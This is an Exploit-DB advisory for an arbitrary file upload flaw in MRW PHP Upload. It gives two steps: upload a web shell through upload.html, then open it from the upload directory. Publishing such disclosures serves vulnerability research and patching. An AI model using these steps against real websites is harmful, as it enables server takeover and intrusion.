MRW PHP Upload - Arbitrary File Upload

EDB-ID:

11431

CVE:

N/A

Author:

Phenom

Type:

webapps

Platform:

PHP

Published:

2010-02-13

# Date: 12/02/2010
# Author: Phenom
# Software Link: http://www.mrwebmaster.it/_store/script/php_luke_mrw_upload.zip
# Version: 
# Tested on: Windows xp sp3

------------------------------------------------------

 _____  _                                
|  __ \| |                               
| |__) | |__   ___ _ __   ___  _ __ ___  
|  ___/| '_ \ / _ \ '_ \ / _/\| '_ ` _ \ 
| |    | | | |  __/ | | | (_) | | | | | |
|_|    |_| |_|\___|_| |_|\/__/|_| |_| |_|


------------------------------------------------------

#######   MRW PHP Upload Remote File Upload Vulnerability   #####################
#
#       Author : Phenom
#
#       vendor : www.lukeonweb.net
#
#################################################################################

####### Exploit #################################################################
#
#     1- http://site.com/path/upload.html
#
#         upload your shell 
#
#     2- http://site.com/path/upload/yourshell.php
#
#         get your shell
#
#################################################################################